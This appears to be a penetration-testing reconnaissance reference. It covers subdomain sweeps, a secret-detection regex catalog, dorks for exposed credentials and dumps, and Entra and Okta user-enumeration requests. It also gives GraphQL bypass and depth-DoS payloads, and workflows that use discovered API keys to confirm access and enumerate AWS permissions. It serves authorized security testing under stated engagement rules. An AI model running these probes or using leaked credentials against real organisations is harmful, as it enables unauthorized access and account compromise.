$D = "target.example"
$prefixes = @("www","mail","webmail","owa","autodiscover","ftp","vpn","sslvpn","gateway","api","app","portal","login","sso","idp","iam","identity","accounts","oauth","auth","adfs","admin","intranet","hr","sap","erp","crm","support","help","status","grafana","kibana","docs","wiki","jira","jenkins","gitlab","dev","test","staging","stg","qa","uat","sandbox","preprod","preview","careers","jobs","eapps","old","legacy","beta","tender","suppliers","procurement")
foreach ($p in $prefixes) {
  $r = Resolve-DnsName "$p.$D" -Type A -ErrorAction SilentlyContinue
  if ($r) {
    $ips = ($r | ? {$_.IPAddress}).IPAddress -join ","
    "$p.$D -> $ips"
  }
}

One-liner (bash + dig):

D="target.example"
for p in www mail webmail owa autodiscover ftp vpn sslvpn gateway api app portal login sso idp iam identity accounts oauth auth adfs admin intranet hr sap erp crm support help status grafana kibana docs wiki jira jenkins gitlab dev test staging stg qa uat sandbox preprod preview careers jobs eapps old legacy beta tender suppliers procurement; do
  IP=$(dig +short A "$p.$D" | head -1)
  [ -n "$IP" ] && echo "$p.$D -> $IP"
done

Mass DNS approach (faster for large prefix lists):

# Generate candidate FQDNs from a wordlist; resolve in parallel via puredns
puredns resolve <(awk -v d="$D" '{print $1"."d}' assetnote-best-dns-wordlist.txt) -r resolvers.txt

What to extract from each hit:

  • IP / IP block → ASN lookup (§28.1) → confirms target-owned vs hosted-elsewhere.
  • For vpn.* / gateway.* / gp.* / globalprotect.* / citrix.* → flag for active vendor fingerprint (§16.16) under separate engagement scope.
  • For api.* / app.* → seed for §16.1–16.10 webapp probes.
  • For staging.* / dev.* / uat.* → seed for §16.5 always-on HTTP checks (often weaker auth + debug endpoints).
  • For intranet.* / eapps.* / sclepro.* → public-intranet finding (often MEDIUM; per §40).

Real-engagement validation: in an internal smoke test, prefix-sweep found vpn., api., intranet., staging., support., eapps., sclepro., autodiscover. — all of which crt.sh missed (or returned 502 for). Treat passive + active as complementary, not alternatives.


17. Secret-Pattern Catalog — 48 patterns (29 base + 19 modern)

The catalog runs against any text source: GitHub code, Postman workspaces, JS bodies, sourcesContent blobs, mobile-app strings, Wayback HTML, paste sites, Stack Exchange code blocks. Order matters: most-specific patterns first so generic catches don't pre-empt typed ones.

# Name Regex Severity Category
1 AWS Access Key \b(AKIA|ASIA)[0-9A-Z]{16}\b CRITICAL aws
2 AWS Secret Key (typed) (?i)aws[_\-]?secret[_\-]?access[_\-]?key['"\s:=]+([A-Za-z0-9/+=]{40}) CRITICAL aws
3 AWS Secret (loose) (?i)aws(.{0,20})?(secret|sk)["'=: ]+([0-9a-z/+=]{40}) HIGH aws
4 GCP Service Account JSON "type"\s*:\s*"service_account" CRITICAL gcp
5 Google API Key \bAIza[0-9A-Za-z_\-]{35}\b HIGH gcp
6 GitHub Classic PAT \bghp_[A-Za-z0-9]{36}\b CRITICAL github
7 GitHub Fine-grained PAT \bgithub_pat_[A-Za-z0-9_]{82}\b CRITICAL github
8 GitHub OAuth \bgho_[A-Za-z0-9]{36}\b HIGH github
9 GitHub Server-to-Server \bgh[usr]_[A-Za-z0-9]{36,}\b HIGH github
10 Stripe Live Key \bsk_live_[0-9A-Za-z]{24,}\b CRITICAL stripe
11 Stripe Test Key \bsk_test_[0-9A-Za-z]{24,}\b LOW stripe
12 Slack Token \bxox[abpors]-[0-9A-Za-z\-]{10,48}\b HIGH slack
13 Slack Webhook https://hooks\.slack\.com/services/T[A-Z0-9]+/B[A-Z0-9]+/[A-Za-z0-9]+ MEDIUM slack
14 SendGrid Key \bSG\.[A-Za-z0-9_\-]{22}\.[A-Za-z0-9_\-]{43}\b HIGH email_svc
15 Mailgun Key (v1) \bkey-[0-9a-zA-Z]{32}\b HIGH email_svc
16 Mailgun Key (loose) \bkey-[0-9a-f]{32}\b HIGH email_svc
17 Twilio API Key \bSK[0-9a-fA-F]{32}\b HIGH twilio
18 Twilio Account SID \bAC[a-f0-9]{32}\b MEDIUM twilio
19 Twilio Auth Token (?i)twilio(.{0,20})?(auth|token)["'=: ]+([a-f0-9]{32}) HIGH twilio
20 Heroku API Key (?i)heroku(.{0,20})?api["'=: ]+([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}) MEDIUM paas
21 Firebase URL \bhttps?://[a-z0-9\-]+\.firebaseio\.com\b LOW firebase
22 JWT (any) \beyJ[A-Za-z0-9_\-]{10,}\.eyJ[A-Za-z0-9_\-]{10,}\.[A-Za-z0-9_\-]{10,}\b MEDIUM jwt
23 Bearer Token Assignment (?i)authorization["'=: ]+bearer\s+[A-Za-z0-9._\-]{20,} MEDIUM bearer
24 Basic Auth in URL https?://[^/\s:@]+:[^/\s:@]+@[^/\s]+ MEDIUM basic_auth
25 RSA Private Key -----BEGIN REDACTED PRIVATE KEY----- CRITICAL private_key
26 EC Private Key -----BEGIN REDACTED PRIVATE KEY----- CRITICAL private_key
27 OpenSSH Private Key -----BEGIN REDACTED PRIVATE KEY----- CRITICAL private_key
28 Generic Private Key -----BEGIN (DSA |PGP |)PRIVATE KEY----- CRITICAL private_key
29 Generic API Key (?i)(?:api[_\-]?key|apikey|api_secret|access_token|secret[_\-]?token)['"\s:=]+["']([A-Za-z0-9+/=_\-]{24,})["'] MEDIUM generic
30 Anthropic API Key \bsk-ant-(?:api03|admin01)-[A-Za-z0-9_\-]{93,}\b CRITICAL ai_api
31 OpenAI API Key (legacy) \bsk-[A-Za-z0-9]{20}T3BlbkFJ[A-Za-z0-9]{20}\b CRITICAL ai_api
32 OpenAI Project Key \bsk-proj-[A-Za-z0-9_\-]{40,}T3BlbkFJ[A-Za-z0-9_\-]{40,}\b CRITICAL ai_api
33 OpenAI User Session \bsess-[A-Za-z0-9]{40}\b HIGH ai_api
34 HuggingFace Token \bhf_[A-Za-z0-9]{30,}\b HIGH ai_api
35 Cloudflare API Token \b[A-Za-z0-9_\-]{40}\b (when paired with (?i)cloudflare/X-Auth-Key context) HIGH infra_api
36 Cloudflare Global API Key (?i)cf[_\-]?api[_\-]?key['"\s:=]+([a-f0-9]{37}) CRITICAL infra_api
37 DigitalOcean Token \bdop_v1_[a-f0-9]{64}\b HIGH infra_api
38 npm Token (Modern) \bnpm_[A-Za-z0-9]{36}\b HIGH package_registry
39 PyPI Token \bpypi-AgENdGV[A-Za-z0-9_\-]+\b HIGH package_registry
40 Docker Hub PAT \bdckr_pat_[A-Za-z0-9_\-]{27,}\b HIGH package_registry
41 Atlassian API Token \bATATT3xFfGF0[A-Za-z0-9_\-]{180,}\b HIGH saas_api
42 New Relic License Key \b(?:NRAA|NRAK|NRBR)-[A-F0-9]{27}\b MEDIUM observability
43 DataDog API Key (in DD_API_KEY context) (?i)dd[_\-]?api[_\-]?key['"\s:=]+([a-f0-9]{32}) HIGH observability
44 Sentry DSN https://[a-f0-9]+@o[0-9]+\.ingest\.sentry\.io/[0-9]+ LOW observability
45 ngrok Auth Token \b[12][A-Za-z0-9]{26}_[A-Za-z0-9]{32,}\b (when (?i)ngrok context) MEDIUM tunneling
46 Linear API Key \blin_api_[A-Za-z0-9]{40}\b MEDIUM saas_api
47 Discord Bot Token \b[MN][A-Za-z\d]{23}\.[\w\-]{6}\.[\w\-]{27}\b HIGH bot_token
48 Telegram Bot Token \b\d{8,10}:[A-Za-z0-9_\-]{35}\b HIGH bot_token

False-positive notes:

  • Patterns 22 (JWT), 23 (Bearer), 29 (Generic) trigger on test/example data frequently. Always look at context — a JWT in a README.md example block ≠ a JWT in a production .env file.
  • Pattern 16 (Mailgun loose) and pattern 11 (Stripe test) are noisy by design; severity is set low for that reason.
  • Pattern 24 (Basic auth in URL) catches monitoring-tool URLs and CI-debug URLs as well as real creds — verify before alerting.
  • For GitHub's Fine-grained PAT (pattern 7), the 82 length is by GitHub's spec — be skeptical of matches significantly longer or shorter.

18. Dork Corpus — 80+ templates, 9 categories

Substitute {domain} with the target domain (e.g., example.com) and {company} with the company name (e.g., Acme Corporation). Run via Google, Bing, Brave, DuckDuckGo, Yandex, Baidu — engines surface different results.

18.1 Files

site:{domain} filetype:env
site:{domain} ext:env OR ext:ini OR ext:cfg OR ext:conf
site:{domain} ext:sql OR ext:sqlite OR ext:dump OR ext:bak
site:{domain} ext:pem OR ext:key OR ext:p12 OR ext:pfx
site:{domain} ext:log
site:{domain} intitle:"index of"
site:{domain} inurl:.git OR inurl:/.git/
site:{domain} inurl:backup OR inurl:.bak OR inurl:old
site:{domain} ext:yml OR ext:yaml
site:{domain} ext:properties

18.2 Admin / login panels

site:{domain} inurl:admin OR inurl:login OR inurl:sso OR inurl:dashboard
site:{domain} intitle:"phpMyAdmin"
site:{domain} intitle:"Jenkins"
site:{domain} intitle:"Grafana"
site:{domain} intitle:"Kibana"
site:{domain} intitle:"Splunk"
site:{domain} (intitle:"login" OR intitle:"sign in")
site:{domain} intitle:"GitLab"
site:{domain} intitle:"Swagger" OR intitle:"OpenAPI"
site:{domain} inurl:phpinfo

18.3 Secrets / credential leakage

"{domain}" ("api_key" OR "apikey" OR "access_token")
"{domain}" (password OR passwd OR pwd)
site:pastebin.com "{domain}"
site:ghostbin.com "{domain}"
site:rentry.co "{domain}"
site:gist.github.com "{domain}"
site:hastebin.com "{domain}"
"{domain}" "BEGIN RSA PRIVATE KEY"

18.4 Cloud / CI / shadow-IT

site:s3.amazonaws.com "{domain}"
site:storage.googleapis.com "{domain}"
site:blob.core.windows.net "{domain}"
site:digitaloceanspaces.com "{domain}"
site:trello.com "{domain}"
site:*.atlassian.net "{domain}"
site:dev.azure.com "{domain}"
site:bitbucket.org "{domain}"
site:firebaseio.com "{domain}"
site:herokuapp.com "{domain}"

18.5 Docs / intel mining

site:{domain} filetype:pdf (confidential OR internal OR restricted)
site:{domain} filetype:xlsx OR filetype:csv
site:{domain} filetype:docx
site:scribd.com "{company}"
"{company}" filetype:pdf (salary OR payroll OR org-chart OR "organization chart")
site:linkedin.com/in "{company}"
site:slideshare.net "{company}"

18.6 Vuln indicators

site:{domain} intext:"sql syntax" OR intext:"you have an error in your sql"
site:{domain} intext:"Warning: mysql_"
site:{domain} intext:"Fatal error:" intext:"on line"
site:{domain} intext:"stack trace" OR intext:"Traceback (most recent call last)"
"Apache/2.4.49" site:{domain}
"Server: nginx/1.14" site:{domain}
site:{domain} inurl:wp-content OR inurl:wp-includes

18.7 Internal tool exposure

site:{domain} intitle:"Splunk"
site:{domain} intitle:"Grafana"
site:{domain} intitle:"Kibana"
site:{domain} intitle:"Prometheus Time Series"
site:{domain} intitle:"Jaeger UI"
site:{domain} intitle:"AlertManager"
site:{domain} intitle:"Argo CD"
site:{domain} intitle:"Sonarqube"
site:{domain} intitle:"Sentry"
site:{domain} intitle:"Confluence"
site:{domain} intitle:"Jira"
site:{domain} intitle:"GitLab"
site:{domain} intitle:"Gitea"
site:{domain} intitle:"Drone CI"
site:{domain} inurl:"/jenkins/"

18.8 Backup / dump file extensions

site:{domain} ext:bak OR ext:backup OR ext:old OR ext:orig OR ext:save OR ext:swp
site:{domain} ext:tar OR ext:tar.gz OR ext:tgz OR ext:zip OR ext:rar OR ext:7z
site:{domain} ext:db OR ext:sqlite OR ext:sqlite3 OR ext:mdb
site:{domain} ext:dump OR ext:rdb OR ext:bson
site:{domain} (intext:"-- MySQL dump" OR intext:"PostgreSQL database dump")
site:{domain} ext:pcap OR ext:pcapng OR ext:cap
site:{domain} ext:core OR ext:hprof OR ext:dmp

18.9 Sector-specific (healthcare / finance / gov)

# Healthcare
site:{domain} (filetype:pdf OR filetype:xlsx) (HIPAA OR PHI OR "patient records")
site:{domain} ("DICOM" OR "HL7" OR "ICD-10")

# Finance
site:{domain} (filetype:pdf OR filetype:xlsx) (SOC OR "audit report" OR "internal control")
site:{domain} (filetype:pdf OR filetype:xlsx) ("Form 10-K" OR "Form 10-Q" OR earnings)
site:{domain} ("SWIFT" OR "BIC" OR IBAN OR "wire transfer")

# Gov / public sector
site:{domain} (filetype:pdf OR filetype:doc) (FOUO OR "controlled unclassified" OR CUI)
site:{domain} (filetype:pdf OR filetype:xlsx) ("personnel security" OR clearance)

18.10 Result classification

After running, score each result via URL signature → title hint → snippet regex:

  • CRITICAL URL signatures: .pem, .p12, .pfx, .key extensions; id_rsa filename.
  • HIGH URL signatures: /.env, /.git/, database dumps, wp-config.bak, /phpmyadmin, /jenkins, /phpinfo.php.
  • MEDIUM URL signatures: /admin, /login, /swagger, .log, /backup, .DS_Store.
  • Snippet content (e.g., a secret regex hit in the snippet) overrides URL signature only if higher severity.
  • Confidence: snippet-only match = TENTATIVE (operator must visit URL to confirm; tag detectability=medium).

19. GitHub Code-Search Dorks for Targets — 13 dorks

Apply each template to {target} (root domain stem like acme), {domain} (full root domain like acme.com), and optionally {company} (Acme Corporation):

"{target}" filename:.env
"{target}" filename:.env.example
"{target}" filename:config
"{target}" AWS_ACCESS_KEY_ID
"{target}" AWS_SECRET_ACCESS_KEY
"{target}" password
"{target}" api_key
"{target}" secret
"{target}" authorization: Bearer
"{target}" filename:id_rsa
"{target}" filename:.git-credentials
"{target}" filename:wp-config.php
"@{domain}" password                        # emails + password context

Requirements: GitHub personal access token (any scope; recommend a fine-grained PAT with read-only repo access). Rate limit per token; concurrency cap ≤5.

For each result:

  1. Fetch the file (or relevant fragment) via the GitHub Contents API.
  2. Run the secret catalog (§17).
  3. If a secret hits → SECRET_LEAK finding with catalog severity, evidence = repo URL + file path + matched secret (truncated, last 4 chars only).
  4. Optional: clone the repo to a tempdir, run trufflehog/gitleaks for full history scan.

20. Endpoint Interest Score — 0–100 rubric

For every classified endpoint (§22 in methodology skill), apply this rubric:

Signal Points Conditions
Unauth write +40 POST/PUT/DELETE/PATCH endpoint returns 200/201/202/204 anonymously.
Open GraphQL introspection +35 __schema query returns full type list anonymously.
Verb tampering bypass +30 OPTIONS reveals method not documented; that method is accessible.
Reflected CORS + credentials +25 Access-Control-Allow-Origin reflects request Origin AND Access-Control-Allow-Credentials: true.
Sensitive keyword in path +20 Path matches one of: admin, internal, debug, user, password, token, key, export, upload, backup, config, secret, private, delete, purge, wipe.
Schema leak in error +20 Response body contains stack trace, ORM error class, framework signature (e.g., ActiveRecord::RecordNotFound, org.hibernate.exception.*, django.db.utils.IntegrityError).
API key in URL +15 Path or query string contains api_key=, apikey=, token=, access_token=.
Wildcard CORS +10 Access-Control-Allow-Origin: *.
Missing rate-limit headers +10 No RateLimit-* / X-RateLimit-* headers; no Retry-After after rapid requests.

Thresholds:

Score Severity
≥ 90 CRITICAL
70–89 HIGH
50–69 MEDIUM
25–49 LOW
< 25 INFO

For score ≥ 70, attach an attack_path_hint in evidence (see §29).


21. Mobile App Ownership Confidence — 0–100 rubric

Before running deep APK static analysis, score whether the discovered app actually belongs to the target. Threshold: ≥70 = accept.

Signal Points
Package reverse-DNS matches target domain (e.g., com.acme.androidacme.com) +40
Developer email is <anything>@<target-domain> +25
Developer website URL is the target domain (or a confirmed sibling brand domain) +20
App name contains a brand keyword from operator-supplied brand list +10
App has ≥ minimum review-score threshold (default 20 reviews) +5

Apps below threshold are tagged mobile_review_pending and shown but not analyzed. Operator can re-score with --mobile-ownership-threshold 50 for noisier collection.


22. Identity Fabric — Concrete Endpoints

Methodology lives in the companion osint-methodology skill §11. This is the URL/payload reference.

22.1 Microsoft Entra (Azure AD)

OIDC metadata + tenant GUID extraction:

GET https://login.microsoftonline.com/{tenant-or-domain}/.well-known/openid-configuration

Response field issuer contains the tenant GUID. GUID regex:

\b[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\b

Detectability: low.

getuserrealm.srf — managed vs federated probe:

GET https://login.microsoftonline.com/getuserrealm.srf?login=<probe-user>@<domain>

Response: JSON with NameSpaceType field (Managed / Federated / Unknown). Federated also includes FederationBrandName and AuthURL (the upstream IdP URL). Detectability: low.

Autodiscover v2:

POST https://autodiscover-s.outlook.com/autodiscover/metadata/json/1
Body: {"Email": "<probe-user>@<domain>"}

Returns the protocol endpoint for the user; presence indicates tenant membership. Detectability: low.

Autodiscover IP correlation (passive M365 confirmation):

Resolve autodiscover.<domain> and check if it lands in Microsoft Exchange Online IP space. This works even when MX is wrapped by Mimecast/Proofpoint/Barracuda inbound filtering, where MX alone doesn't reveal the underlying mail platform.

dig +short A autodiscover.target.example
Resolve-DnsName "autodiscover.$D" -Type A | Select Name,IPAddress

Microsoft Exchange Online IPs (truncated common ranges): 40.96.0.0/13, 52.96.0.0/14, 13.107.6.152/31, 13.107.18.10/31, 40.99.0.0/16, 40.104.0.0/15, 52.98.0.0/15. Full list: Office 365 URLs and IP address ranges.

If autodiscover.<domain> lands in that space → M365_CONFIRMED even when nothing else does. Detectability: low (passive DNS).

GetCredentialType — user-enum (deep mode only):

POST https://login.microsoftonline.com/common/GetCredentialType
Content-Type: application/json
Body:
{
  "username": "<email>",
  "isOtherIdpSupported": true,
  "checkPhones": false,
  "isRemoteNGCSupported": true,
  "isCookieBannerShown": false,
  "isFidoSupported": true,
  "originalRequest": "",
  "country": "US",
  "forceotclogin": false,
  "isExternalFederationDisallowed": false,
  "isRemoteConnectSupported": false,
  "federationFlags": 0
}

Response field IfExistsResult indicates user existence: 0 = exists, 1 = doesn't exist, 5 = exists in federated tenant. Detectability: medium (logged in tenant audit). Cap at 20 attempts per tenant.

22.2 Okta

Org slug derivation: start with stems from discovered subdomains and root-domain stem. Probe <slug>.okta.com and <slug>.oktapreview.com. Slug regex:

[a-z0-9][a-z0-9-]{1,40}\.okta(?:preview)?\.com

OIDC fingerprint:

GET https://<slug>.okta.com/.well-known/openid-configuration

/api/v1/authn user-enum (deep mode):

POST https://<slug>.okta.com/api/v1/authn
Content-Type: application/json
Body: {"username": "<email>", "password": "invalid_password_for_enum"}

Response distinguishes user existence:

  • 400 with errorCode: E0000004 → user doesn't exist (or generic password error in some configs).
  • 401 with status: PASSWORD_WARN / LOCKED_OUT / MFA_REQUIRED → user exists. Detectability: medium (audit-log per attempt). Cap at 20 attempts per tenant.

22.3 ADFS

Passive fingerprint:

GET https://{domain}/adfs/idpinitiatedsignon.aspx

A 200 OK with a urn:com:microsoft:ADFS: reference in HTML indicates ADFS. Version-string greppable in HTML resource references.

Mex endpoint (deep mode):

GET https://{domain}/adfs/Services/Trust/mex

Returns SOAP federation metadata including endpoint URLs, signing certs, and supported claim types.

22.4 Google Workspace

OIDC discovery:

GET https://{domain}/.well-known/openid-configuration

Google-Workspace-hosted-domain customers expose discovery endpoints with characteristic issuer URI (https://accounts.google.com) and JWKS URI. MX records pointing to aspmx.l.google.com are a corroborating signal.

22.5 Generic OIDC (Keycloak / Auth0 / Ping / OneLogin / Duo)

Discovery: probe /.well-known/openid-configuration on every alive subdomain. The issuer and authorization_endpoint field URLs fingerprint the product:

Product URL pattern in issuer
Auth0 https://*.auth0.com
OneLogin https://*.onelogin.com
Ping https://*.pingone.com, https://*.pingidentity.com
Duo https://*.duosecurity.com
Keycloak URL contains /realms/<realm>
OneLogin https://*.onelogin.com

22.6 SAML metadata

See §16.6.

22.7 AWS account-ID extraction

S3 bucket region header (passive):

HEAD https://<known-bucket>.s3.amazonaws.com/

Response includes x-amz-bucket-region. Cross-reference with bucket name entropy and known patterns to scope the account.

ARN regex (in any JSON / HTML / JS response):

arn:aws:[a-z0-9\-]+:[a-z0-9\-]*:([0-9]{12}):

Capture group: 12-digit AWS account ID.

AccountId property pattern:

(?i)["']?account[_\-]?id["']?\s*[:=]\s*["']([0-9]{12})["']

Google OAuth client_id:

\b\d{8,}-[a-z0-9]{10,40}\.apps\.googleusercontent\.com\b

MSAL / Microsoft client_id (GUID property):

(?i)["']?client[_\-]?id["']?\s*[:=]\s*["']([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})["']

OAuth scope extraction:

(?i)["']?scope["']?\s*[:=]\s*["']([^"']+)["']

22.8 Microsoft 365 Deep Enumeration (Teams / SharePoint / OneDrive / OAuth)

Teams federation status:

# Resolve tenant first
curl -sk -m 10 "https://login.microsoftonline.com/${TARGET_DOMAIN}/.well-known/openid-configuration" | jq -r '.issuer'
# Federation API requires authenticated request from a federated tenant; presence of error pattern reveals fed status
curl -sk -m 10 "https://teams.microsoft.com/api/mt/emea/beta/users/<email>/externalsearchv3"

SharePoint subdomain probe:

STEM=$(echo $TARGET_DOMAIN | cut -d. -f1)
for sub in "" "-my" "-admin"; do
  echo "=== ${STEM}${sub}.sharepoint.com ==="
  curl -sk -m 10 -I "https://${STEM}${sub}.sharepoint.com/" -w '%{http_code}\n'
done

Reading the result correctly: HTTP 200 from these probes means the tenant exists (Microsoft serves a generic redirect-to-auth page) — it does NOT mean anonymous access is granted to the tenant's content. Distinguish:

  • 200 → tenant provisioned (INFO).
  • 200 + redirect to a custom anonymous-share URL (/sites/<x>/Lists/<y>/AllItems.aspx?guestaccesstoken=...) discovered via dorks → HIGH (data exposure).
  • 401/403 → tenant exists but auth required (INFO).
  • 404 / NXDOMAIN → tenant not provisioned at this stem (or vanity-named — check known stems from cert transparency).

PowerShell:

$STEM = ($D -split '\.')[0]
foreach ($s in @("","-my","-admin")) {
  try {
    $r = Invoke-WebRequest -Uri "https://${STEM}${s}.sharepoint.com/" -Method Head -UseBasicParsing -TimeoutSec 10
    "${STEM}${s}.sharepoint.com -> HTTP $($r.StatusCode) (tenant exists)"
  } catch {
    $code = $_.Exception.Response.StatusCode.value__
    if ($code) { "${STEM}${s}.sharepoint.com -> HTTP $code" } else { "${STEM}${s}.sharepoint.com -> no host" }
  }
}

OneDrive personal site probe (for a known email alice@acme.com):

USER_TOKEN=$(echo "alice@acme.com" | tr '@.' '__')
STEM="acme"
curl -sk -m 10 -I "https://${STEM}-my.sharepoint.com/personal/${USER_TOKEN}/Documents/" -w '%{http_code}\n'
# 401 = exists; 404 = not provisioned

M365 OAuth client_id discovery in JS:

curl -sk -m 10 "https://app.target.example/main.js" | \
  grep -oE 'clientId["'\''[:=]+ ?["'\'']?[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'

Device-code phishing target check (look for device_authorization_endpoint in OIDC metadata):

curl -sk -m 10 "https://login.microsoftonline.com/${TARGET_DOMAIN}/v2.0/.well-known/openid-configuration" | \
  jq '.device_authorization_endpoint'

If non-null and tenant doesn't restrict device-code: MEDIUM finding (device-code phishing feasible).

Power Platform / Dynamics URLs to check:

  • *.crm.dynamics.com (per-region: crm, crm2-crm15, crm.dynamics.com).
  • *.api.crm.dynamics.com (Web API).
  • make.powerapps.com / flow.microsoft.com (auth-required dashboards).

Severity:

  • Discovered SharePoint/OneDrive tenants → INFO (asset only).
  • Anonymous SharePoint anonymous-share link → HIGH (data exposure).
  • device_authorization_endpoint enabled on tenant → MEDIUM (operational risk).
  • Multi-tenant OAuth app with broad Graph scopes published by target → HIGH.

22.9 GraphQL Field-Suggestion Enumeration (when introspection disabled)

When the standard introspection query (§16.2) returns "errors":[{"message":"GraphQL introspection is disabled"}], fall back to field-suggestion enumeration. Apollo and most GraphQL libraries enable "did you mean" suggestions by default.

Detection probe:

curl -sk -m 10 -X POST "$T/graphql" \
  -H 'Content-Type: application/json' \
  -d '{"query":"{ __schema { types { name } } }"}' | jq -r '.errors[0].message'
# If "introspection disabled" → proceed.

Field-suggestion probe (intentionally typo a field name to trigger suggestions):

curl -sk -m 10 -X POST "$T/graphql" \
  -H 'Content-Type: application/json' \
  -d '{"query":"{ usre { id } }"}' | jq -r '.errors[].message'
# Expected: "Cannot query field \"usre\" on type \"Query\". Did you mean \"user\", \"users\", \"userById\"?"

Iterate over a candidate-field wordlist (use SecLists Discovery/Web-Content/graphql.txt or clairvoyance library's seed list). Each suggestion reveals real field names. Continue until no new suggestions emerge.

Tooling:

  • Clairvoyance (pip install clairvoyance) — automated field-suggestion enumerator. clairvoyance -w wordlist.txt -o schema.json https://target.example/graphql.
  • GraphQL-Cop — auditor that probes for introspection, batching, depth-limit, suggestion config. pip install graphql-cop.
  • InQL (Burp extension) — Burp Suite extension for GraphQL endpoint analysis.
  • GraphQL Voyager — visualize once schema is reconstructed.

Other GraphQL-when-introspection-disabled techniques:

  • Alias-based query batching (rate-limit / auth-bypass surface):

    {
      "query": "{ a:user(id:1){name} b:user(id:2){name} c:user(id:3){name} ... }"
    }
    

    Many APIs rate-limit per-request, not per-alias. Test 100+ aliases per request.

  • Query-depth-limit bypass (DoS / introspection bypass):

    {
      "query": "{ user { friends { friends { friends { friends { id } } } } } }"
    }
    

    If server allows arbitrary depth → DoS surface; if depth-limited but doesn't strip nested __type/__schema → introspection-via-depth.

  • Subscription enumeration via WebSocket:

    wscat -c "wss://target.example/graphql" -s graphql-ws
    > {"type":"connection_init"}
    > {"id":"1","type":"start","payload":{"query":"subscription { __schema { types { name } } }"}}
    
  • Batched query bypass (some servers process all queries in batch even if first fails):

    [
      {"query":"{ __schema { types { name } } }"},
      {"query":"{ user(id:1) { name } }"}
    ]
    

Severity:

  • Field-suggestion enumeration succeeds (50+ fields recoverable) → MEDIUM MISCONFIG.
  • Alias batching not rate-limited → MEDIUM (rate-limit-bypass surface).
  • Subscription endpoint exposed without auth → MEDIUM (often used for real-time data exfil).

23. Read-Only Secret Validators

Use these to confirm a discovered credential is live. Read-only, never destructive. Tag every validation with detectability and checked_at (UTC).

23.1 Postman API Key (PMAK-*)

GET https://api.getpostman.com/me
Header: X-Api-Key: PMAK-<key>
  • 200 → live; response contains {user: {id, username, email}}.
  • 401 → dead.
  • Scope: full read access to the user's Postman account (collections, env vars, history).
  • Detectability: low.

23.2 AWS Access Key

sts:GetCallerIdentity

Use boto3:

import boto3
sts = boto3.client('sts',
    aws_access_key_id='<AKIA...>',
    aws_secret_access_key='<secret>',
    region_name='us-east-1')
ident = sts.get_caller_identity()
# ident['Account'], ident['Arn'], ident['UserId']
  • Valid → returns Account ID + ARN + UserId.
  • Invalid → InvalidClientTokenId or SignatureDoesNotMatch.
  • ARN scope: :user/ is IAM user (broad), :assumed-role/ is temp role (narrow), :root is account root (do NOT validate root keys you find).
  • Detectability: medium (CloudTrail logs GetCallerIdentity in account <found>).

23.3 GitHub PAT

GET https://api.github.com/user
Header: Authorization: token <ghp_*>
  • 200 → live; response contains login, id, name, email (if public).
  • Response header X-OAuth-Scopes lists token scopes. repo scope = write to all accessible repos; admin:org = org admin.
  • 401 → dead.
  • Detectability: low.

23.4 Slack Token

POST https://slack.com/api/auth.test
Header: Authorization: Bearer <xox*-*>
  • 200 with {"ok": true} → live; response includes team, team_id, user, user_id.
  • 200 with {"ok": false, "error": "invalid_auth"} → dead.
  • Detectability: low.

23.5 Anthropic API Key

GET https://api.anthropic.com/v1/models
Headers:
  x-api-key: sk-ant-api03-...
  anthropic-version: 2023-06-01
  • 200 → live; response lists available models.
  • 401 → dead.
  • 403 with org_disabled → key valid but org disabled.
  • Detectability: low; usage shows in Anthropic Console for the workspace owner.

23.6 OpenAI API Key

GET https://api.openai.com/v1/models
Header: Authorization: Bearer sk-...
  • 200 → live; lists models (may include org-specific fine-tunes).
  • 401 → dead.
  • 429 → live but quota exhausted.
  • Detectability: low; usage shows in OpenAI dashboard.

23.7 npm Token

GET https://registry.npmjs.org/-/whoami
Header: Authorization: Bearer npm_<token>
  • 200 with {"username": "<user>"} → live.
  • 401 → dead.
  • For scope check: GET /-/npm/v1/tokens returns the token's permissions (read/publish).
  • Detectability: low.

23.8 Atlassian API Token

GET https://<workspace>.atlassian.net/rest/api/3/myself
Auth: Basic <base64(email:ATATT3xFfGF0_...)>
  • 200 → live; returns account profile + email.
  • 401 → dead.
  • Workspace required — extract from leaked repo URL or Atlassian dork results.
  • Detectability: low.

23.9 DataDog API + APP Key

GET https://api.datadoghq.com/api/v1/validate
Headers:
  DD-API-KEY: <api-key>
  DD-APPLICATION-KEY: <app-key>
  • 200 → both keys valid.
  • 403 → either key invalid.
  • Per-region URL varies: api.datadoghq.eu, api.us3.datadoghq.com, etc.
  • Detectability: low; appears in DataDog audit log.

23.10 Validator output schema

{
  "status":          "verified_live" | "verified_dead" | "scope_restricted" |
                     "scope_unrestricted" | "validation_skipped_by_policy" |
                     "validation_unsupported" | "validation_failed_transient",
  "provider":        "postman" | "aws" | "github" | "slack" | "anthropic" | "openai" | "npm" | "atlassian" | "datadog",
  "account_id":      "<opaque>",
  "scope":           "<freeform>",
  "metadata":        {<provider-specific>},
  "checked_at":      "<UTC ISO8601>",
  "detectability":   "low" | "medium" | "high"
}

23.11 Hard rules

  • Read-only endpoint only.
  • Never use the validated credential to create, modify, delete, or send anything.
  • Tag every validation with detectability.
  • Record checked_at (UTC).
  • If RoE forbids validation → validation_skipped_by_policy, stop, document.
  • For root AWS keys, infrastructure-write GitHub PATs, or admin Slack tokens — flag for the operator and let them decide.

23.12 Post-Discovery Enumeration Workflows

After validation confirms a key is live, you often want to enumerate what it can do. Stay read-only.

AWS access key — IAM enum:

export AWS_ACCESS_KEY_ID="AKIA..."
export AWS_SECRET_ACCESS_KEY="..."

# Identity (already done as part of validation)
aws sts get-caller-identity

# IAM-user details (only if ARN was :user/)
aws iam get-user
aws iam list-attached-user-policies --user-name $(aws iam get-user --query 'User.UserName' --output text)
aws iam list-user-policies --user-name $(aws iam get-user --query 'User.UserName' --output text)
aws iam list-groups-for-user --user-name $(aws iam get-user --query 'User.UserName' --output text)

# What can I actually do? (simulate-principal-policy for common dangerous actions)
aws iam simulate-principal-policy \
  --policy-source-arn $(aws sts get-caller-identity --query Arn --output text) \
  --action-names s3:ListAllMyBuckets ec2:DescribeInstances iam:ListUsers \
                 secretsmanager:ListSecrets ssm:DescribeParameters \
                 lambda:ListFunctions rds:DescribeDBInstances

